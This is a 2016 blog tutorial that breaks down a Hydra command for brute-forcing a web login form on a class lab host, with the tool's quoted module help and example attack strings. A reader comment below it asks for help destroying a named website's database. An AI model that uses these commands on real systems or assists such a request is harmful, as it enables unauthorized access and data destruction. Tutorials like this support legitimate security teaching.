Tuesday, April 12, 2016

Detailed Explanation of Hydra's Syntax for Web Form Attacks

This article will break down the syntax we used for Hydra in the article, Brute forcing a website login form using Hydra and the video Brute Force Website Login Attack Using Hydra

In general you can usually type 'man' followed by the program name to read the manual. However hydra doesn't have a manual, but just typing 'hydra' will show you the basic info or 'hydra -h' for more info. Below is the basic help. One of the best command for detailed help with a module is to use the '-U' option followed by the module name. Here are all the modules:


asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 teamspeak telnet[s] vmauthd vnc xmpp 
So here is the command I used:
hydra -l root -p 557 -v attack.samsclass.info http-get-form "/brute4.php:login=^USER^&pin=^PASS^:Denied"

To start we have the program name, hydra followed by -l userName or -L userNameFile.txt The -l option is for a login name. Then we have the -p password or -P passwordFile.txt This is for the password or password file. The -v is optional, it stands for verbose (it is an option that most all programs have, and can come in handy to see what's happening.) Verbose just means that it will show you a lot of information that would not normally be shown (you can read more by running hydra -h )

Next we have attack.samsclass.info This is the domain name we will be attacking don't incluse the http:// or https:// and don't include anything past or including the / after the name. 

Now we have the service module to run, in this case it is http-get-form. This tells hydra that it will be attacking an http web form by making a get request (most forms use post, just FYI.) You can learn a ton more by running 'hydra -U http-get-form' Here is a quote of what it says:

The parameters take three ":" separated values, plus optional values.(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)
Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]First is the page on the server to GET or POST to (URL).Second is the POST/GET variables (taken from either the browser, proxy, etc. with usernames and passwords being replaced in the "^USER^" and "^PASS^" placeholders (FORM PARAMETERS)Third is the string that it checks for an *invalid* login (by default) Invalid condition login check can be preceded by "F=", successful condition login check must be preceded by "S=". This is where most people get it wrong. You have to check the webapp what a failed string looks like and put it in this parameter!

Next we have the three required parameters in quotes separated by a colin ':', "/brute4.php:login=^USER^&pin=^PASS^:Denied" So first is the URL that the form posts to, /brute4.php. Then the posted query string or options, login=^USER^&pin=^PASS^ So this is what the form submits, if you look at a form, this would be the name of any input, checkbox etc. 


Here we have 'login' and 'pin'. Hydra replaces ^USER^ with the username or usernames from the username file and it replaces ^PASS^ with the provided password or passwords from the password file. Finally we have the third required parameter, Denied this is the text to look for to know the login failed. In our case it is Denied, but this will be different for different sites. Optionally you can look for a successful login text, something that is only shown when you successfully login. You can do this with a `S=' followed by the text. An example of a successful login text may be the username, as some sites show the username once you login.

Hopefully this has helped you understand what each part of the syntax we used does. Here is the full help for the http-get-form module:
Help for module http-get-form:===========================================================================Module http-get-form requires the page and the parameters for the web form.By default this module is configured to follow a maximum of 5 redirections ina row. It always gathers a new cookie from the same URL without variablesThe parameters take three ":" separated values, plus optional values.(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]First is the page on the server to GET or POST to (URL).Second is the POST/GET variables (taken from either the browser, proxy, etc. with usernames and passwords being replaced in the "^USER^" and "^PASS^" placeholders (FORM PARAMETERS)Third is the string that it checks for an *invalid* login (by default) Invalid condition login check can be preceded by "F=", successful condition login check must be preceded by "S=". This is where most people get it wrong. You have to check the webapp what a failed string looks like and put it in this parameter!The following parameters are optional: C=/page/uri     to define a different page to gather initial cookies from (h|H)=My-Hdr\: foo   to send a user defined HTTP header with each request                 ^USER^ and ^PASS^ can also be put into these headers!                 Note: 'h' will add the user-defined header at the end                 regardless it's already being sent by Hydra or not.                 'H' will replace the value of that header if it exists, by the                 one supplied by the user, or add the header at the endNote that if you are going to put colons (:) in your headers you should escape them with a backslash (\). All colons that are not option separators should be escaped (see the examples above and below). You can specify a header without escaping the colons, but that way you will not be able to put colons in the header value itself, as they will be interpreted by hydra as option separators.Examples: "/login.php:user=^USER^&pass=^PASS^:incorrect" "/login.php:user=^USER^&pass=^PASS^&colon=colon\:escape:S=authlog=.*success" "/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed" "/:user=^USER&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^" "/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb" 

2 comments:

  1. Hello
    There are 2 persons in Egypt are stealing and bluffing the people around the world with there websites.
    www.gn4m.com specially I am diying to do something for these people, at least to destroy his database. I have all the proof but in Arabic and you want to help I can translate it for you.
    I will try to follow your steps.
    fadishaya@gmail.com
    Thank you

    ReplyDelete